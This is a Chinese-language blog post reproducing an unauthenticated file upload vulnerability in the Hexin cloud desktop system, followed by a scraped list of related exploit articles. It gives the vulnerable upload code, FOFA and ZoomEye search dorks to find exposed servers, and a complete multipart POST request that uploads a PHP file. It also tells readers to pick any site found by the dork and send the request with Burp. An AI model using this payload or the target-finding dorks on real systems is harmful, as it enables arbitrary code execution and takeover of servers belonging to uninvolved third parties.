和信创天云桌面系统VENGD文件上传漏洞复现
1.漏洞概述
和信创天下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理、安全、运维需求。
2021HW期间,爆出和信创天下一代云桌面爆出文件上传漏洞,攻击者可利用该漏洞写入php恶意代码,从而控制服务器。
2.漏洞分析
漏洞存在/Upload/upload_file.php文件中,由于没有做任何过滤,直接上传。漏洞代码:
$target_path=$_SERVER["DOCUMENT_ROOT"]."/Upload/".$l."/".$_FILES["file"]["name"];
3.影响版本
未知(20210408之前版本)
4.漏洞等级
高危
5.漏洞复现
5.1 FOFA实战复现
关键词:
body="和信下一代云桌面"
zoomEy:title:和信下一代云桌面
POST Payload:
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: X.X.X.X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/avif
<?php
phpinfo();
?>
------WebKitFormBoundaryfcKRltGv--
直接fofa找一波
、
随便找一个站burp post一下
打开url xxx/upload/test/phpinfo.php
注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
和信创天云桌面系统VENGD文件上传漏洞复现相关推荐
- 【漏洞复现】和信创天云桌面系统—任意文件上传
简介 和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计 ...
- 和信创天云桌面系统远程命令执行 RCE漏洞复现渗透测试
前言 和信创天云桌面系统,官方介绍,市场上主要有华为.深信服.锐捷.和信创天四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
- 和信创天云桌面系统远程命令执行
若天下不定,吾往:若世道不平,不回! 漏洞描述 和信创天云桌面系统存在默认配置导致文件上传并可以远程命令执行 漏洞影响 和信创天云桌面系统 漏洞复现 构造payload POST /Upload/u ...
- Goby 漏洞更新 |海康威视部分iVMS系统存在文件上传漏洞
漏洞名称:海康威视部分iVMS系统存在文件上传漏洞 English Name:Some Hikvision iVMS file upload vulnerabilitie CVSS core: 9.8 ...
- php kindeditor 文件不存在_不能取得文件类型!,kindeditor=4.1.5文件上传漏洞复现
原标题:kindeditor<=4.1.5文件上传漏洞复现 0x00:背景 KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE.Fire ...
- UEditor .Net版本任意文件上传漏洞复现总结
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...
最新文章
- 阿里安全新研究:给图片打“马赛克”就能骗过 AI 视觉系统
- CSS2.0中文手册(CHM版)
- 【ESSD技术解读】ESSD Auto PL规格,引领IO性能弹性新方向
- CSTrackV2解读
- python三引号解析_[宜配屋]听图阁
- 使用git时报错出现vim.exe.stackdump
- mysql 建立索引更慢_如何运用“提前发布,经常发布”来建立更好的品牌
- Linux下源码编译安装Redis及如何后台启动Redis
- 使用kitti2bag和RVIZ播放KITTI数据集
- 计算机c盘快满了怎么办,电脑C盘满了怎么办?教你快速清理C盘的垃圾
- 正轴等角割圆锥投影综述
- java reader类子类_Java之InputStreamReader类的实现
- 浏览器主页被hao123锁定解决办法
- 5种方案实现订单30分钟未支付,则自动取消
- 软件测试如何快速入门
- java 判断图片合适,Java 判断图片色彩
- 【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
- 计算机机房的安全知识有哪些,计算机机房消防安全管理制度
- PDF合并:如何将两个PDF文件合并成一个PDF文件
- 关于CSS中left:50%; top:50%; margin-left: -150px; margin-top: -75px;